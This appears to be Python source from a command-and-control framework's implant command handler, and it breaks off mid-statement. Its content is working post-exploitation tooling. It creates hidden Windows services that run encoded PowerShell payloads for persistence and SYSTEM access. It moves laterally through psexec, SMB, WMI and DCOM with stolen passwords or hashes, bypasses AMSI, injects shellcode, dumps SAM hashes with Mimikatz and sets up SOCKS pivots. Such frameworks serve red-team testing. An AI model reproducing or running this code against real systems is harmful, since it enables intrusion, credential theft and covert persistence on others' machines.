def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload, implant_id, commandloop): try: check_module_loaded("Stage2-Core.ps1", randomuri, user) except Exception as e: print("Error loading Stage2-Core.ps1: %s" % e) # alias mapping for alias in ps_alias: if command.startswith(alias[0]): command.replace(alias[0], alias[1]) command = command.strip() run_autoloads(command, randomuri, user) # opsec failures for opsec in ps_opsec: if opsec == command[:len(opsec)]: print(Colours.RED) print("**OPSEC Warning**") impid = get_implantdetails(randomuri) ri = input("Do you want to continue running - %s? (y/N) " % command) if ri.lower() == "n": command = "" if ri == "": command = "" break if command.startswith("beacon") or command.startswith( "set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print( "Invalid sleep command, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) elif command.startswith("unhook-amsi"): new_task("unhook", user, randomuri) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = posh_help.split('\n') for line in helpful: if searchterm in line.lower(): print(Colours.GREEN + line) elif (command == "back") or (command == "clear"): startup(user) elif command == "download-files": print(Colours.RED + "Please enter a full path to the directory" + Colours.GREEN) startup(user) elif command.startswith("install-servicelevel-persistencewithproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % ( payload) new_task(cmd, user, randomuri) elif command.startswith("install-servicelevel-persistence"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % ( payload) new_task(cmd, user, randomuri) elif command.startswith("remove-servicelevel-persistence"): new_task("sc.exe delete CPUpdater", user, randomuri) # psexec lateral movement elif command.startswith("get-implantworkingdirectory"): new_task("pwd", user, randomuri) elif command.startswith("get-system-withproxy"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system-withdaisy"): C2 = get_c2server_all() daisyname = input("Payload name required: ") if os.path.isfile( ("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command.startswith("get-system"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceModule start= auto" % payload new_task(cmd, user, randomuri) cmd = "sc.exe start CPUpdaterMisc" new_task(cmd, user, randomuri) cmd = "sc.exe delete CPUpdaterMisc" new_task(cmd, user, randomuri) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0) elif command.startswith("invoke-psexec ") or command.startswith( "invoke-smbexec "): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user) params = re.compile("invoke-smbexec |invoke-psexec ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -username %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -username %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-smbexec %s" % params new_task(cmd, user, randomuri) elif command.startswith("invoke-psexecproxypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -username %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -username %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-psexecdaisypayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) daisyname = input("Payload name required: ") if os.path.isfile( ("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -username %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -username %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-psexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-psexecpayload"): check_module_loaded("Invoke-PsExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-psexecpayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -username %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -username %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % ( params, payload) new_task(cmd, user, randomuri) # wmi lateral movement elif command.startswith("invoke-wmiexec "): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) params = re.compile("invoke-wmiexec ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -user %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s" % params new_task(cmd, user, randomuri) elif command.startswith("invoke-wmijspbindpayload"): check_module_loaded("New-JScriptShell.ps1", randomuri, user) with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p: payload = p.read() params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE) params = params.sub("", command) new_task( "$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri) cmd = "new-jscriptshell %s -payload $Shellcode64" % (params) new_task(cmd, user, randomuri) target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE) C2 = get_c2server_all() print() print("To connect to the SMB named pipe use the following command:") print( Colours.GREEN + "invoke-pbind -target %s -secret mtkn4 -key %s -pname jaccdpqnvbrrxlaf -client" % (target[0], C2[2]) + Colours.END) print() print( "To issue commands to the SMB named pipe use the following command:" ) print(Colours.GREEN + "pbind-command \"pwd\"" + Colours.END) print() print( "To load modules to the SMB named pipe use the following command:") print(Colours.GREEN + "pbind-loadmodule Invoke-Mimikatz.ps1" + Colours.END) print() print("To kill the SMB named pipe use the following command:") print(Colours.GREEN + "pbind-kill" + Colours.END) elif command.startswith("invoke-wmijsproxypayload"): check_module_loaded("New-JScriptShell.ps1", randomuri, user) if os.path.isfile( ("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"))): with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmijsproxypayload ", re.IGNORECASE) params = params.sub("", command) new_task( "$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy")), user, randomuri) cmd = "new-jscriptshell %s -payload $Shellcode64" % (params) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-wmijsdaisypayload"): check_module_loaded("New-JScriptShell.ps1", randomuri, user) daisyname = input("Name required: ") if os.path.isfile( ("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname))): with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmijsdaisypayload ", re.IGNORECASE) params = params.sub("", command) new_task( "$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname)), user, randomuri) cmd = "new-jscriptshell %s -payload $Shellcode64" % (params) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-wmijspayload"): check_module_loaded("New-JScriptShell.ps1", randomuri, user) with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, ""), "r") as p: payload = p.read() params = re.compile("invoke-wmijspayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in command: p = re.compile(r"-credid (\w*)") credId = re.search(p, command) if credId: credId = credId.group(1) else: startup(user, "Please specify a credid") creds = get_cred_by_id(credId) if creds is None: startup(user, "CredID not found") params = params.replace("-credid %s" % credId, "") params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) new_task( "$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "")), user, randomuri) cmd = "new-jscriptshell %s -payload $Shellcode64" % (params) new_task(cmd, user, randomuri) elif command.startswith("invoke-wmiproxypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -user %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-wmidaisypayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) daisyname = input("Name required: ") if os.path.isfile( ("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -user %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload) new_task(cmd, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-wmipayload"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user) C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() params = re.compile("invoke-wmipayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -user %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % ( params, payload) new_task(cmd, user, randomuri) # dcom lateral movement elif command.startswith("invoke-dcomproxypayload"): if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))): with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p: payload = p.read() params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: params = params + " -domain %s -user %s -hash %s" % ( creds['Domain'], creds['Username'], creds['Hash']) p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % ( target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createproxypayload first") elif command.startswith("invoke-dcomdaisypayload"): daisyname = input("Name required: ") if os.path.isfile( ("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % ( target, payload) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-dcompayload"): C2 = get_c2server_all() newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "", "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() p = re.compile(r'(?<=-target.).*') target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % ( target, payload) new_task(pscommand, user, randomuri) # runas payloads elif command.startswith("invoke-runas "): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) params = re.compile("invoke-runas ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: startup(user, "invoke-runas does not support hash authentication") cmd = "invoke-runas %s" % params new_task(cmd, user, randomuri) elif command.startswith("invoke-runasdaisypayload"): daisyname = input("Name required: ") if os.path.isfile( ("%s%spayload.bat" % (PayloadsDirectory, daisyname))): with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p: payload = p.read() new_task("$proxypayload = \"%s\"" % payload, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeDaisy.ps1", randomuri, user) params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: startup( user, "invoke-runas does not support hash authentication") pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % ( params, base64.b64encode( pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) else: startup(user, "Need to run createdaisypayload first") elif command.startswith("invoke-runasproxypayload"): C2 = get_c2server_all() if C2[11] == "": startup(user, "Need to run createproxypayload first") else: newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], C2[13], C2[11], "", "", C2[19], C2[20], C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) payload = newPayload.CreateRawBase() proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload new_task(proxyvar, user, randomuri) check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipeProxy.ps1", randomuri, user) params = re.compile("invoke-runasproxypayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: startup( user, "invoke-runas does not support hash authentication") pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % ( params, base64.b64encode( pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command.startswith("invoke-runaspayload"): check_module_loaded("Invoke-RunAs.ps1", randomuri, user) check_module_loaded("NamedPipe.ps1", randomuri, user) params = re.compile("invoke-runaspayload ", re.IGNORECASE) params = params.sub("", command) if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if creds['Password']: params = params + " -domain %s -user %s -pass %s" % ( creds['Domain'], creds['Username'], creds['Password']) else: startup(user, "invoke-runas does not support hash authentication") pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();" pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % ( params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8")) new_task(pscommand, user, randomuri) elif command == "help" or command == "?": print(posh_help) elif command == "help 1": print(posh_help1) elif command == "help 2": print(posh_help2) elif command == "help 3": print(posh_help3) elif command == "help 4": print(posh_help4) elif command == "help 5": print(posh_help5) elif command == "help 6": print(posh_help6) elif command == "help 7": print(posh_help7) elif command == "help 8": print(posh_help8) elif command.startswith("get-pid"): pid = get_implantdetails(randomuri) print(pid[8]) elif command.startswith("upload-file"): source = "" destination = "" s = "" nothidden = False if command == "upload-file": check_module_loaded("Inject-Shellcode.ps1", randomuri, user) style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source except KeyboardInterrupt: commandloop(implant_id, user) while not os.path.isfile(source): print("File does not exist: %s" % source) source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source destination = session.prompt("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination nothidden = args.nothidden try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) if (nothidden): uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % ( destination, nothidden, sourceb64) else: uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % ( destination, sourceb64) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input( "Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri) elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command.startswith("migrate"): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, user, params) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("pbind-loadmodule"): params = re.compile("pbind-loadmodule ", re.IGNORECASE) params = params.sub("", command) new_task(("pbind-loadmodule %s" % params), user, randomuri) elif command.startswith("invoke-daisychain"): check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user) urls = get_allurls() new_task("%s -URLs '%s'" % (command, urls), user, randomuri) print("Now use createdaisypayload") elif command.startswith("inject-shellcode"): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) check_module_loaded("Inject-Shellcode.ps1", randomuri, user) style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.shellcode-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter( PayloadsDirectory, glob="*.bin")) path = PayloadsDirectory + path except KeyboardInterrupt: commandloop(implant_id, user) try: shellcodefile = load_file(path) if shellcodefile is not None: arch = "64" new_task( "$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri) new_task( "Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) except Exception as e: print("Error loading file: %s" % e) elif command == "listmodules": modules = os.listdir("%s/Modules/" % POSHDIR) modules = sorted(modules, key=lambda s: s.lower()) print("") print("[+] Available modules:") print("") for mod in modules: if ".ps1" in mod: print(mod) elif command == "modulesloaded": ml = get_implantdetails(randomuri) print(ml[14]) elif command == "ps": new_task("get-processlist", user, randomuri) elif command == "hashdump": check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user) new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri) elif command == "stopdaisy": update_label("", randomuri) new_task(command, user, randomuri) elif command == "stopsocks": update_label("", randomuri) new_task(command, user, randomuri) elif command == "sharpsocks": check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = select_item("HostnameIP", "C2Server") sharpport = select_item("ServerPort", "C2Server") dfheader = select_item("DomainFrontHeader", "C2Server") implant = get_implantdetails(randomuri) pivot = implant[15] if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") if (sharpport != 80 and sharpport != 443): if (sharpurl.count("/") >= 3): pat = re.compile(r"(?<!/)/(?!/)") sharpurl = pat.sub(":%s/" % sharpport, str, 1) else: sharpurl = ("%s:%s" % (sharpurl, sharpport)) print( POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input( "Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if (ri == "") or (ri.lower() == "y"): taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % ( sharpurl, channel, sharpkey, sharpurls) if dfheader: taskcmd += " -DomainFrontURL %s" % dfheader new_task(taskcmd, user, randomuri) update_label("SharpSocks", randomuri) elif command == "history": startup(user, get_history()) elif command.startswith("reversedns"): params = re.compile("reversedns ", re.IGNORECASE) params = params.sub("", command) new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri) elif command.startswith("createdaisypayload"): createdaisypayload(user, startup) elif command.startswith("createproxypayload"): params = re.compile("createproxypayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if not creds['Password']: startup( user, "This command does not support credentials with hashes") createproxypayload(user, startup, creds) elif command.startswith("createnewpayload"): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if not creds['Password']: startup( user, "This command does not support credentials with hashes") createproxypayload(user, startup, creds) else: if command: new_task(command, user, randomuri) return
def handle_sharp_command(command, user, randomuri, startup, implant_id, commandloop): try: check_module_loaded("Stage2-Core.exe", randomuri, user) except Exception as e: print("Error loading Stage2-Core.exe: %s" % e) # alias mapping for alias in cs_alias: if alias[0] == command[:len(command.rstrip())]: command = alias[1] # alias replace for alias in cs_replace: if command.startswith(alias[0]): command = command.replace(alias[0], alias[1]) original_command = command command = command.strip() run_autoloads_sharp(command, randomuri, user) if command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = sharp_help1.split('\n') for line in helpful: if searchterm in line.lower(): print(Colours.GREEN + line) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0) elif command.startswith("upload-file"): source = "" destination = "" s = "" if command == "upload-file": style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source except KeyboardInterrupt: commandloop(implant_id, user) while not os.path.isfile(source): print("File does not exist: %s" % source) source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source destination = session.prompt("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file %s;\"%s\"" % (sourceb64, destination) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command == "bypass-amsi": new_task("run-exe Core.Program Core bypass-amsi", user, randomuri) elif command.startswith("inject-shellcode"): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.shellcode-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter( PayloadsDirectory, glob="*.bin")) path = PayloadsDirectory + path except KeyboardInterrupt: commandloop(implant_id, user) try: shellcodefile = load_file(path) if shellcodefile is not None: new_task( "run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri) except Exception as e: print("Error loading file: %s" % e) elif command.startswith("migrate"): params = re.compile("migrate", re.IGNORECASE) params = params.sub("", command) migrate(randomuri, user, params) elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input( "Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit", user, randomuri) kill_implant(randomuri) elif command == "sharpsocks": from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurls = 